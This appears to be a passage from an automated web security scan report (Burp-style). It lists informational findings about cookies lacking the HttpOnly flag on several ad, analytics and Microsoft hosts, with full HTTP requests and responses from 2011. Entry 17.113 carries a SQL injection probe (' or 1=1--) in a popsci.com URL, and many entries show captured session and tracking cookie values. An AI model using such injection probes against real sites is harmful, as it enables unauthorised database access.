17.112. http://blogs.silverlight.net/showcasehosted/resources/services/BasicService.svc/GetDemos

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.silverlight.net
Path:   /showcasehosted/resources/services/BasicService.svc/GetDemos

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /showcasehosted/resources/services/BasicService.svc/GetDemos HTTP/1.1
Host: blogs.silverlight.net
Proxy-Connection: keep-alive
Referer: http://blogs.silverlight.net/showcasehosted/
Origin: http://blogs.silverlight.net
Content-Type: application/json; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:23:00 GMT
Content-Length: 0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 772476
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:23:02 GMT; expires=Sun, 29-Jan-2012 23:23:02 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:23:05 GMT

{"d":[{"__type":"Demo:#SAW_WebService","demo_id":251,"location_id":840,"name":"Windows Vista Simulator","description":"The Windows Vista experience, simulated on the Web. Created as a demonstration o
...[SNIP]...

17.113. http://bonniercorp.122.2o7.net/b/ss/timepopsci/1/H.14/s78723546345718

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bonniercorp.122.2o7.net
Path:   /b/ss/timepopsci/1/H.14/s78723546345718

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/timepopsci/1/H.14/s78723546345718?[AQB]&ndh=1&t=30/0/2011%2011%3A16%3A16%200%20360&ns=bonniercorp&pageName=popsci%7Cfront-page&g=http%3A//www.popsci.com/%3F172683569%27%2520or%25201%253d1--%2520%3D1&r=http%3A//burp/show/61&cc=USD&events=event2&v1=popsci%7Cfront-page&c17=http%3A//www.popsci.com/%3F172683569%27%2520or%25201%253d1--%2520%3D1&v17=http%3A//www.popsci.com/%3F172683569%27%2520or%25201%253d1--%2520%3D1&c21=Data%20Not%20Available&v21=Data%20Not%20Available&c22=Data%20Not%20Available&v22=Data%20Not%20Available&c23=Data%20Not%20Available&v23=Data%20Not%20Available&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: bonniercorp.122.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/?172683569'%20or%201%3d1--%20=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 17:16:13 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26A2CE6E851D0395-6000012A402043A3[CE]; Expires=Fri, 29 Jan 2016 17:16:13 GMT; Domain=bonniercorp.122.2o7.net; Path=/
Location: http://bonniercorp.122.2o7.net/b/ss/timepopsci/1/H.14/s78723546345718?AQB=1&pccr=true&vidn=26A2CE6E851D0395-6000012A402043A3&&ndh=1&t=30/0/2011%2011%3A16%3A16%200%20360&ns=bonniercorp&pageName=popsci%7Cfront-page&g=http%3A//www.popsci.com/%3F172683569%27%2520or%25201%253d1--%2520%3D1&r=http%3A//burp/show/61&cc=USD&events=event2&v1=popsci%7Cfront-page&c17=http%3A//www.popsci.com/%3F172683569%27%2520or%25201%253d1--%2520%3D1&v17=http%3A//www.popsci.com/%3F172683569%27%2520or%25201%253d1--%2520%3D1&c21=Data%20Not%20Available&v21=Data%20Not%20Available&c22=Data%20Not%20Available&v22=Data%20Not%20Available&c23=Data%20Not%20Available&v23=Data%20Not%20Available&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Sat, 29 Jan 2011 17:16:13 GMT
Last-Modified: Mon, 31 Jan 2011 17:16:13 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www282
Content-Length: 0
Content-Type: text/plain


17.114. http://boyle.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boyle.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: boyle.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:05:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=9ff34bdc0b2e32fcc178bd49c46b26f9; expires=Sat, 25-Jan-2031 02:05:03 GMT; path=/; domain=.newsvine.com
Content-Length: 0
Content-Type: text/html
Connection: close


17.115. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2117809&PluID=0&w=300&h=60&ord=35801428&ifrm=1&ncu=$$http://g.redacted/_2AD0003L/79000000000085282.1?!&&PID=7902678&UIT=G&TargetID=28253485&AN=35801428&PG=INVPC2&ASID=a610568226dd43348f3d9fefa630960e$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=f+JvabEk02WG00002h5iUabNA07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ852G0000000003sS7dNH0000000002sZ8cVQ0000000001sV83xP0000000001sF852N0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 30 Jan 2011 12:56:45 GMT
Connection: close
Content-Length: 2204

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

17.116. http://c.redcated/c.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.redcated
Path:   /c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=8d80f2036804487297c74ec177b267a0&udc=true&rnd=1296343587672&RedC=c.redacted&MXFR=AD04D6F8B2FF44629973BD0674351135 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: c.redcated
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Location: http://c.redacted/c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.redacted%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=8d80f2036804487297c74ec177b267a0&udc=true&rnd=1296343587672&MUID=AD04D6F8B2FF44629973BD0674351135
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=AD04D6F8B2FF44629973BD0674351135; domain=.redcated; expires=Wed, 17-Aug-2011 23:26:33 GMT; path=/;
Date: Sat, 29 Jan 2011 23:26:33 GMT
Content-Length: 0


17.117. http://c.bing.com/c.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.bing.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074 HTTP/1.1
Host: c.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/results.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=1; _FP=BDCE=129407839256968337&BDCEH=7BEF6608F1F2E27015D4037638CCD541; MUID=F741A5D3C8544F77A0B57D8439E7E06E; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c9874d115203d4525a6dc5f12136077f0; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; SRCHD=MS=1621031&D=1593447&AF=NOFORM; _SS=SID=4318D78D50E640FC90E674B1FECFA468&hIm=178

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Location: http://c.redcated/c.gif?DI=15074&RedC=c.bing.com&MXFR=F741A5D3C8544F77A0B57D8439E7E06E
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; domain=.bing.com; expires=Thu, 18-Aug-2011 17:11:11 GMT; path=/;
Date: Sun, 30 Jan 2011 17:11:10 GMT
Content-Length: 0


17.118. http://c.redacted/c.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.redacted
Path:   /c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=8d80f2036804487297c74ec177b267a0&udc=true&rnd=1296343587672 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: c.redacted
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1

Response

HTTP/1.1 302 Redirect
Date: Sat, 29 Jan 2011 23:26:33 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: MUID=AD04D6F8B2FF44629973BD0674351135&TUID=1; domain=.redacted; expires=Wed, 17-Aug-2011 23:26:33 GMT; path=/;
Connection: Keep-Alive
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Location: http://c.redcated/c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.redacted%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=8d80f2036804487297c74ec177b267a0&udc=true&rnd=1296343587672&RedC=c.redacted&MXFR=AD04D6F8B2FF44629973BD0674351135


17.119. http://c.statcounter.com/t.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=1890207&resolution=1920&h=1200&camefrom=http%3A//news.ycombinator.com/news&u=http%3A//informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual&t=Information%20Arbitrage%20-%20Start%20Fund%3A%20No%20big%20deal.%20Business%20as%20usual.&java=1&security=9e00f8ff&sc_random=0.31911576888523996&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
Proxy-Connection: keep-alive
Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc609958.1294848674.1-2495334.1296072601.0

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:47:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc609958.1294848674.1-2495334.1296072601.0-1890207.1296398873.0; expires=Fri, 29-Jan-2016 14:47:53 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

17.120. http://calendar.live.com/calendar/calendar.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://calendar.live.com
Path:   /calendar/calendar.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /calendar/calendar.aspx HTTP/1.1
Host: calendar.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 30 Jan 2011 02:06:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
xxn:23
X-AspNet-Version: 2.0.50727
x-dns-prefetch-control: off
X-UA-Compatible: IE=7
X-Content-Type-Options: nosniff
MSNSERVER: H: cal1-w23 V: 15.4.120.117 D: 2011-01-18T01:29:02
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353171&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fcalendar.live.com%2F%2Fcalendar%2Fcalendar.aspx&lc=1033&id=64362&mkt=en-us
Set-Cookie: mktstate=S=-1659053062&U=&E=&P=&B=en; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en; domain=.live.com; path=/
Set-Cookie: mkt2=ui=en-us; domain=.calendar.live.com; path=/
Set-Cookie: mt=; domain=.calendar.live.com; expires=Thu, 01-Jan-1970 12:00:01 GMT; path=/
Set-Cookie: WLC=; domain=.calendar.live.com; expires=Thu, 01-Jan-1970 12:00:01 GMT; path=/
Set-Cookie: PSC=; domain=.calendar.live.com; expires=Thu, 01-Jan-1970 12:00:01 GMT; path=/
Set-Cookie: CCN=; domain=.calendar.live.com; expires=Thu, 01-Jan-1970 12:00:01 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Sun, 06-Feb-2011 02:06:11 GMT; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 334

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296353171&amp;rver=6.1.6206.0&amp;wp=MBI&amp;wrep
...[SNIP]...

17.121. http://careers.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://careers.redacted
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: careers.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 30 Jan 2011 02:06:11 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
Set-Cookie: MC1=V=3&GUID=da39980442014ca6b9da39619943b989; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8EDD00D637154D4B841C122EB598FF5B; domain=.redacted; expires=Thu, 18-Aug-2011 02:06:11 GMT; path=/
Cache-Control: no-cache
Content-Length: 0


17.122. http://citi.bridgetrack.com/event/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /event/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /event/?type=-1&BTData=C02177F736E617E5C504A43B1BEBEA9AD95978492FFF7F6EFEAC5C2DEF029DB7&BT_PUB=2&BT_VEN=2331&BT_TRF=26638&r=[RANDOM] HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://redcated/NYC/iview/264935949/direct;;wi.300;hi.250/01?click=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBT%5F9=; AdData=S1C=1&S1T=201101282216000635&S1=98231z612428; ASB9=TX=1296270961&Pb=0&A=8&SID=3E5F37C0F6194C72A60362B4B4E88931&Vn=0&Ct=0&Pc=0&S=&Cn=194&Pd=8&T=38566&Cr=98231&W=40099&Tr=40099&Cp=4740&P=612428&B=9; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; ATV9=49137dTQ9L1c62c4K4cIM2Cccc2VTNc15L6cc1753c8c8cc1753ccccc

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 43
Content-Type: image/GIF
Expires: Sat, 29 Jan 2011 13:00:32 GMT
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBTSES=SID=3632A0E47C3A454A9ED45144B2EBD941; path=/
Set-Cookie: VCC9=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: ATV9=57504dTQ9L1c62c4K4cIM2Cccc2VTNc15L6cc1753c8c8cc1753cccccdTU091cc4DEcOR16c2c28Rc2VJ6c14TAccQ0Eccccccccc; expires=Wed, 02-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Wed, 25-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: ASB9=TX=1296392433&W=0&Tr=26638&Cp=4526&P=814118&B=9&T=37802&Cr=97894&S=0&Cn=0&Pd=0&SID=6A9811BEC51D4B829380A28CF78C1BE2&Vn=2331&Ct=0&Pc=0&Pb=2&A=0; expires=Wed, 02-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: CitiBT%5F9=; expires=Wed, 25-Jan-2012 05:00:00 GMT; path=/
Date: Sun, 30 Jan 2011 13:00:32 GMT
Connection: close

GIF89a.............!.......,...........L..;

17.123. http://clk.redcated/APM/go/139941180/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /APM/go/139941180/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /APM/go/139941180/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.meaningfulbeauty.com/?uci=US-MT-O-DI-MI-2906
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353263-3972457; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=7E5205F6A748400B84AD01F34006AE37; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/285d4; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=b882065/285d4/10e4d581/bab9/4d44c7ef; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:07:43 GMT
Connection: close


17.124. http://clk.redcated/APM/go/148848786/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /APM/go/148848786/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /APM/go/148848786/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://attuverseoffers.com/page4/index.html?1&source=ECbc0000000WIP00O&GUID=DA936173-6614-470C-8AAF-8DD52E3643E8
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353265-3982025; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=5DEF820424F84B24B69D3D93ECECB25F; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1a43a; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bce8f84/1a43a/11174245/bab9/4d44c7f1; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:07:45 GMT
Connection: close


17.125. http://clk.redcated/BEL/go/262582811/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /BEL/go/262582811/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BEL/go/262582811/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.sharebuilder.com/affiliates/?PC=sb&SID=520062934056594&MGDURL=Web%2Fwelcome%2Fwp%2Findex.htm&cmpid=10101414
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353269-3932791; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=CE711711131C4C8D81F8D0F57B52D165; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1c72; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=af8724c/1c72/fa6b21b/bab9/4d44c7f5; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:07:48 GMT
Connection: close


17.126. http://clk.redcated/CNT/go/286609711/direct

Summary

Severity:   Information
Confidence:   Certain
